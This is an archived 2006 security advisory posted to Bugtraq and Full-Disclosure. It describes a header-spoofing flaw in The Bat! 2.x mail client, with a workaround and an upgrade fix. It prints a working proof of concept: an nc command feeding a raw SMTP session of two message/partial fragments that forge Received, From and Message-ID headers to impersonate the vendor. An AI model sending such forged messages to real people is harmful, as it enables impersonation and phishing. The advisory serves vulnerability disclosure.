| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1261622004.20060206210142@SECURITY.NNOV.RU>
Date: Mon, 6 Feb 2006 21:01:42 +0300
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: bugtraq@...urityfocus.com
Cc: SecuriTeam <support@...uriteam.com>, full-disclosure@...ts.grok.org.uk
Subject: SECURITY.NNOV: The Bat! 2.x message headers
spoofing
Title: The Bat! 2.x message headers spoofing
Author: 3APA3A <3APA3A@...urity.nnov.ru>
Homepage: http://www.security.nnov.ru/
Advisory URL: http://www.security.nnov.ru/advisories/thebatspoof.asp
Vendor: RitLabs
Vendor's page http://thebat.net/
Application: The Bat 2.x (2.12.04 tested)
Not vulnerable: The Bat! 3.5
Remote: Yes, against client
Category: Information spoofing
Intro:
The Bat! is very convenient, powerful and secure (comparing with
others) MUA (Mail User Agent) with many professional features:
templates, macroses, Bayesian SPAM filter, etc. This is commercial
product from RitLabs.
Vulnerability:
Design flow in the way The Bat! shows message/partial messages allow
attacker to spoof RFC 822 headers or original message, including _all_
Received: and Message-ID:. It makes it possible to create untrackable
message and spoof message origin, including sender's network.
Details:
The Bat! silently re-assembles partial message and shows encapsulated
data. The headers shown are ones of encapsulated message. Real headers
are lost completely.
Exploit:
Replace @example.com with destination address
nc ip_of_smtp_relay 25 <thebatexploit.txt
-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <phiby@...mple.com>
RCPT TO: <phiby@...mple.com>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <phiby@...mple.com>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@...bat.net>
To: Phiby <phiby@...mple.com>
Subject: Subject: Re[7]: //
Message-ID: <p#1split@...0994591752.20060130184706@...bat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="split@...0994591752.20060130184706@...bat.net";
number=1; total=2
Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
for <phiby@...mple.com>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <bugs@...bat.net>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@...bat.net>
To: Phiby <phiby@...mple.com>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit
Dear Phiby,
Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <phiby@...mple.com>
RCPT TO: <phiby@...mple.com>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <phiby@...mple.com>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@...bat.net>
To: Phiby <phiby@...mple.com>
Subject: Subject: Re[7]: //
Message-ID: <p#2split@...0994591752.20060130184706@...rosof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="split@...0994591752.20060130184706@...bat.net";
number=2; total=2
Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=- end thebatexploit.txt -=-=-=-=-
Workaround:
Do not trust data The Bat! shows in headers.
Solution:
Upgrade to The Bat! 3.x (not free)
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists